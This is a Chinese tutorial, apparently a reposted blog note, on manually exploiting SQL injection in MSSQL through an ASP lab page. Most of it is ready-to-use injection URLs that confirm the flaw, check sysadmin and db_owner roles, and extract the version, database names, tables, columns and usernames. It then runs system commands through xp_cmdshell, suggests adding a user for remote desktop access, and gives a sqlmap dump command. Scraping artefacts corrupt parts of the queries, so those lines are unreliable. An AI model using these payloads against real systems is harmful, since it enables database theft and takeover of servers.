一、手工注入@H_502_1@
Step1:检测注入点@H_502_1@
通过payload检测 @H_502_1@
http://……/less-1.asp?id=1' and 1=1--@H_502_1@
http://……/less-1.asp?id=1' and 1=2--@H_502_1@
select * from sysobjects (sysobjects 系统对象表,保存当前数据库的对象)@H_502_1@
select * from users where id=1 and exists(select * from sysobjects) 有结果说明该数据库是mssql@H_502_1@
http://……/less-1.asp?id=1' union select * from users where id=1 and exists(select * from sysobjects)--@H_502_1@
@H_Step3:注入点权限的判断(根据页面显示效果)@H_502_1@
select IS_SRVROLEMEMBER('sysadmin'); 判断当前是否为sa@H_502_1@
http://……/less-1.asp?id=1' and (select IS_SRVROLEMEMBER('sysadmin'))>0--@H_502_1@
@H_select is_srvrolemember('db_owner'); 判断当前用户写文件、读文件的权限(db_owner)@H_502_1@
http://……/less-1.asp?id=1' and (select IS_SRVROLEMEMBER('db_owner'))>0--@H_502_1@
@H_select is_srvrolemember('public');判断是否有public权限,可以爆破表@H_502_1@
http://……/less-1.asp?id=1' and (select IS_SRVROLEMEMBER('public'))>0--@H_502_1@
@H_Step4:信息收集@H_502_1@
1‘ and (user)=1--@H_502_1@
当前数据库版本: select @@version = 1 报错@H_502_1@
http://……/less-1.asp?id=1' and (select @@version)=1--@H_502_1@
@H_http://……/less-1.asp?id=1' and (user)=1--@H_502_1@
@H_当前数据库: select db_name() @H_502_1@
http://……/less-1.asp?id=1' and (select db_name())=1--@H_502_1@
@H_db_name(0) 当前数据库,其中的参数表示第几个数据库@H_502_1@ SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','aspcms');
SELECT top 1 Name FROM Master..SysDatabases 在系统数据库中能够查询所有的数据库@H_502_1@
where name not in ('master','aspcms') 表示查找的结果不在括号中的集合中@H_502_1@
select top 1 name from test.sys.all_objects where type='U' and is_ms_shipped=0 获取第一个表名@H_502_1@
http://……/less-1.asp?id=1' and (select top 1 name from test.sys.all_objects where type='U' and is_ms_shipped=0)=1--@H_502_1@
@H_select top 1 name from test.sys.all_objects where type='U' and is_ms_shipped=0 and name not in ('emails') 第二个表名@H_502_1@
http://……/less-1.asp?id=1' and (select top 1 name from test.sys.all_objects where type='U' and is_ms_shipped=0 and name not in ('emails'))=1--@H_502_1@
@H_select top 1 column_name from test.@R_768_4045@ion_schema.columns where table_name='users' 获取第一个字段@H_502_1@
http://……/less-1.asp?id=1' and (select top 1 column_name from test.@R_768_4045@ion_schema.columns where table_name='users')=1--@H_502_1@
@H_select top 1 column_name from test.@R_768_4045@ion_schema.columns where table_name='users' and column_name not in ('id') 第二个字段@H_502_1@
http://……/less-1.asp?id=1' and (select top 1 column_name from test.@R_768_4045@ion_schema.columns where table_name='users' and column_name not in ('id'))=1--@H_502_1@
@H_select top 1 username from users@H_502_1@
http://……/less-1.asp?id=1' and (select top 1 username from users)=1--@H_502_1@
@H_@H_502_1@
二、MSsql的 xp_cmdshell 模块@H_502_1@
select count(*) FROM master. dbo.sysobjects Where xtype ='X' AND name = 'xp_cmdshell'@H_502_1@
exec master..xp_cmdshell 'whoami' //执行系统命令@H_502_1@
http://………….asp?id=1';exec master..xp_cmdshell 'whoami'-- //不显示执行结果@H_502_1@
如果想看到执行命令之后的结果:需要创建一个临时表,将执行结果写进去,最后再读@H_502_1@
也可以直接通过命令创建用户,通过远程桌面登录目标计算机@H_502_1@
@H_502_1@
三、使用sqlMAP对MSsql注入漏洞进行利用@H_502_1@
sqlmap.py -u “target_url” -dbs mssql --dump --force-pivoting@H_502_1@
@H_502_1@
@H_502_1@
@H_502_1@
@H_502_1@
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
